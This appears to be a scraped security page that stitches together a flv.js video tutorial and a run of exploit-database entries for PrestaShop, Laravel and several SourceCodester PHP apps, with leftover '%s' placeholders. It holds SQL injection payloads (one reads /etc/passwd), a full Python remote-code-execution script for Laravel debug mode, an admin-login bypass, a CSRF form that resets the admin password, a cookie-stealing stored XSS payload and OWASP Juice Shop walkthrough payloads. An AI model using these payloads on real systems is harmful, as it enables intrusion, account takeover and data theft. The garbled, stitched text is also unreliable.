We know that in H5, the video tag is used to play videos. But it only parses common formats such as mp4 avi. However, formats such as flv m3u8 are not supported. How to solve it?
Know flv.js
A JavaScript library that implements playing FLV format videos in HTML5 videos. It works by multiplexing FLV file streams into ISO BMFF (MP4 fragment) fragments, and feeding the MP4 fragments into the browser via Media Source Extensions.
flv.js only does one thing. After obtaining the audio and video data in FLV format, it decodes the FLV data through native JS, and then feeds the native HTML5 Video tags through the Media Source Extensions API. (HTML5 natively only supports playback mp4/webm format, not FLV)
Code Example
First, we need to introduce flv.js first
script src='https://cdn.bootcss.com/flv.js/1.3.3/flv.js'/scripttml code is as follows: video width='300px' height='400px' id='videoElement' controls/video
script
if (flvjs.isSupported()) {
var videoElement=document.getElementById('videoElement');
var flvPlayer=flvjs.createPlayer({
type: 'flv',
url: 'https://pull-f3.douyincdn.com/third/stream-111864726937404075_hd.flv?abr_pts=-1800'
});
flvPlayer.attachMediaElement(videoElement);
flvPlayer.load();
flvPlayer.play();
}
/script effect is as followshttp://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028190554.png?x-oss-process=style/gzh
Crawl the camera live stream
We also often use the cameras of attractions for live broadcasts. How did it be done?
Here we take the home TPLink camera as an example.
Share the device in the camera app and then grab the live stream.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028191837.png?x-oss-process=style/gzh Catch data packets http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028191954.png?x-oss-process=style/gzh Test http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028192206.png?x-oss-process=style/gzh
Summary
In this issue, we will explain the crawling of the live video streaming protocol. The principle is also very simple, it is just to capture packets and filter live broadcast protocol flv m3u8.
HireHackking

Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection

HACKER · %s · %s

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection # Date: 08-01-2021 # Exploit Author: Jaimin Gondaliya # Vendor Homepage: https://www.prestashop.com # Software Link: https://www.prestashop.com/en/download # Version: Prestashop CMS - 1.7.7.0 # Tested on: Windows 10 Parameter: id_product Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt) Exploit: http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)
HireHackking
# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple SQL Injections # Exploit Author: Mesut Cetin # Date: 2021-01-12 # Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code # Affected Version: 1.0 # Vulnerable parameter: "Search" bar (POST method) # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 SQL Injection is a type of an injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case. Explanation: The function "person.php" takes user input through the search bar at line 45: "$_POST['search']" and uses it without any sanitization for the following SQL statement (line 46-49): $sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'"; $mydb->setQuery($sql); $cur = $mydb->executeQuery(); $numrows = $mydb->num_rows($cur);//get the number of count A single quote (') at the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL synthax errors. Proof of Concept: Since the php code lacks of sanitization of the user input, multiple SQL injection queries can be found. 1. Boolean-based SQL injection POST request the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 -- search=' or 1=1 -- 2. Union-based SQL injection To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request http://localhost/CemeteryMapping/index.php?q=person): search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- - If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL commands: @@hostname : Current Hostname @@tmpdir : Temp Directory @@datadir : Data Directory @@version : Version of DB @@basedir : Base Directory user() : Current User database() : Current Database version() : Version schema() : current Database UUID() : System UUID key current_user() : Current User current_user : Current User system_user() : Current System user session_user() : Session user @@GLOBAL.have_symlink : Check if Symlink is enabled or disabled @@GLOBAL.have_ssl : Check if it have SSL or not 3. Time-based SQL injection For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- - Mitigation: By using prepared statements and parameterized queries, the SQL injection can be prevented.
HireHackking

Online Movie Streaming 1.0 - Admin Authentication Bypass

HACKER · %s · %s

# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass # Exploit Author: Richard Jones # Date: 2021-01-13 # Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit URL: http://TARGET/onlinemovies/Plogin.php POST /onlinemovies/Plogin.php HTTP/1.1 Host: TARGET Content-Type: application/x-www-form-urlencoded Content-Length: 48 Origin: http://TARGET Connection: close Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj Upgrade-Insecure-Requests: 1 mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=
HireHackking

Online Shopping Cart System 1.0 - 'id' SQL Injection

HACKER · %s · %s

# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection # Date: 14.1.2021 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code # Version: 1.0 # Tested on: Kali Linux Use SQLMAP: sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3
HireHackking

Laravel 8.4.2 debug mode - Remote code execution

HACKER · %s · %s

# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution # Date: 1.14.2021 # Exploit Author: SunCSR Team # Vendor Homepage: https://laravel.com/ # References: # https://www.ambionics.io/blog/laravel-debug-rce # https://viblo.asia/p/6J3ZgN8PKmB # Version: <= 8.4.2 # Tested on: Ubuntu 18.04 + nginx + php 7.4.3 # Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce #!/usr/bin/env python3 import requests, sys, re, os header={ "Accept": "application/json" } data = { "solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\ "parameters":{ "variableName":"cm0s", "viewFile":"" } } def clear_log(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass requests.post(url=url, json=data, headers=header, verify=False) requests.post(url=url, json=data, headers=header, verify=False) def create_payload(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text: return True return False def convert(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 200: return True return False def exploited(url='', viewFile=''): global data data['parameters']['viewFile'] = viewFile resp = requests.post(url=url, json=data, headers=header, verify=False) if resp.status_code == 500 and 'cannot be empty' in resp.text: m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text) print() print(m[0][1]) def generate_payload(command='', padding=0): if '/' in command: command = command.replace('/', '\/') command = command.replace('\'', '\\\'') os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g' > payload.txt'''%(command)) payload = '' with open('payload.txt', 'r') as fp: payload = fp.read() payload = payload.replace('==', '=3D=') for i in range(padding): payload += '=00' os.system('rm -rf payload.txt') return payload def main(): if len(sys.argv) < 4: print('Usage: %s url path-log command\n'%(sys.argv[0])) print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\''%(sys.argv[0])) exit(1) if not os.path.isfile('./phpggc/phpggc'): print('Phpggc not found!') print('Run command: git clone https://github.com/ambionics/phpggc.git') os.system('git clone https://github.com/ambionics/phpggc.git') url = sys.argv[1] path_log = sys.argv[2] command = sys.argv[3] padding = 0 payload = generate_payload(command, padding) if not payload: print('Generate payload error!') exit(1) if 'http' not in url and 'https' not in url: url = 'http'+url else: url = url+'/_ignition/execute-solution' print('\nExploit...') clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) create_payload(url, 'AA') create_payload(url, payload) while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))): clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log)) create_payload(url, 'AA') padding += 1 payload = generate_payload(command, padding) create_payload(url, payload) exploited(url, 'phar://%s'%(path_log)) if __name__ == '__main__': main()
HireHackking

Title: Owasp juice shop (2) Shooting range difficulty ⭐

HACKER · %s · %s

In the previous article, we talked about the installation of Owasp juice shop. This article will follow my cousin’s footsteps to get through the level! This article mainly talks about the difficulty of one-star pass strategy.
Bonus Payload(Payload)
Description: Use reward payment load in the DOM XSS challenge.
payload: Just copy the code to the search box.
iframe width='100%' height='166' scrolling='no' frameborder='no' allow='autoplay' src='https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076color=%23ff5500auto_play=truehide_related=falseshow_comments=trueshow_user=trueshow_reposts=falseshow_teaser=true'/iframe
DOM XSS
Description: DOM-based XSS attack
payload:
iframe src='javascript:alert(`xss`)'
Confidential Files
Description: Check confidential documents
We clicked about us and found a hyperlink. Click on the hyperlink and grab the packet in burp.

Modify the contents in front of ftp. You can see the following file information.
Click to read in turn and this level will be passed.
Bully Chatbot
This level is very simple, which means chatting with the robot and obtaining a discount coupon. When the content of the chat post contains a code, the robot will send you a discount coupon.
Exposed Metrics
Description: Find out the server data obtained by backend services using common monitoring software
By accessing the documents in the official website, you can check the default backend entry address (localhost:3000/metrics).
Missing Encoding
Description: Retrieve photos of Bjoern cat 'Brave Mode'.
Click on the photo wall and found that an image was not loaded. The image review element found that the url of the image is img _ngcontent-utp-c241='' class='image' src='assets/public/images/uploads/-#zatschi-#whoneedsfourlegs-1572600969477.jpg' alt=' #zatschi #whoneedsfourlegs'
The image here has not been parsed because the URL contains special conformity needs and performs a conversion, which will cause some exceptions. Here, change # in the url to %23.
Outdated Allowlist
Search for keyword redirect in js file?
Just visit the url.
Repetitive Registration
Click the registration page, review element button, and delete disabled='true'. At this time, we only enter the user name and the others are empty, so we can register directly.
Zero Stars
Click on the customer feedback page to review the elements of the button, remove disabled='true'
At this time, we only need to enter the verification code to submit.
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## Vulnerable to SQL Injection. // vulnerable parameter at include/room.php, line 25: $mydb->setQuery("SELECT * FROM ".self::$tbl_name." Where `ROOMID`= {id} LIMIT 1"); ######## Proof of Concept ######### The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection. Payload: (select*from(select(sleep(10)))a) Proof of Concept: http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF) # Exploit Author: Mesut Cetin # Date: 2021-01-14 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## Vulnerable to Cross-site request forgery (CSRF), can lead to full account takeover of Administrator account. ######## Proof of Concept ######### Send the victim the following PoC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/marimar/admin/mod_users/controller.php?action=edit" method="POST"> <input type="hidden" name="USERID" value="1" /> <input type="hidden" name="UNAME" value="Anonymous" /> <input type="hidden" name="USERNAME" value="admin" /> <input type="hidden" name="deptid" value="" /> <input type="hidden" name="UPASS" value="admin" /> <!-- change this to the new password you wish --> <input type="hidden" name="ROLE" value="Administrator" /> <input type="hidden" name="deptid" value="" /> <input type="hidden" name="PHONE" value="912852478" /> <input type="hidden" name="save" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection # Exploit Author: Mesut Cetin # Date: 2021-01-15 # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0 ######## Description ######## The 'person' parameter is vulnerable to time-based SQL Injection. ######## Proof of Concept ####### Payload: (select*from(select(sleep(10)))a) Using Burp Suite, send the following POST request: POST /marimar/index.php?p=booking HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/marimar/index.php?p=booking Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc Upgrade-Insecure-Requests: 1 arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0
HireHackking
# Exploit Title: Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS # Exploit Author: Siva Rajendran # Date: 2020-12-31 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Windows 10, Firefox Version 84.0 Step 1. Go to sign up page Step 2. In the "Last Name" field, use the following XSS payload "><img src=xx onerror=alert(document.cookie)> as the name and click on save. Step 3. This should trigger the Stored XSS payload in admin panel users tab, once the admin login into the application to verify the registered users email address. The attacker steals the admin session cookie